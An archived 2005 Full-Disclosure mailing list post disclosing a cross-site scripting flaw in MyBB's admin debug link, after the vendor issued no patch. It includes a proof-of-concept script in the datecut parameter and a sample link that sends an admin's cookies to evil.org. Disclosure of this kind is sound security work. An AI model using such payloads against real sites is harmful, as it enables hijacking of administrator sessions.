| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <0112F88D0204DF4B817F2E089C4ED6B0214BBC@MORLAND.stpaulsschool.org.uk> Date: Mon Sep 5 15:02:59 2005 From: Dominic.Parikh at stpauls.richmond.sch.uk (Parikh, Dominic) Subject: XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2) XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2) Vendor: given SEVEN days notice, no patch released! Just to say, I am apalled with the fact that I contacted MyBB on the 30 August, and was originally not planning to go public. However, because they have failed to release a patch I have decided to alert the wider community. At the bottom of every page shown to the admins is a debug link. Unfortunately, this fails to properly sanitize user input, so, for example, you could try: 'forumdisplay.php?fid=2&datecut=""><script>alert(document.cookie)</scrip t>' Although only admins can exploit this vuln, someone could send them a link such as [forumdisplay.php?fid=2&datecut= <http://www.forum.com/forumdisplay.php?fid=2&datecut=> ""><script>window.location="http://evil.org/steal.php?cookie="+document. cookie</script>] and ouch! robokoder fusionnx.com- The Web Developer's Resource Centre ##################################################################################### This email has been scanned by MailMarshal, an email content filter. ##################################################################################### -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050905/ebfd6007/attachment.html
Powered by blists - more mailing lists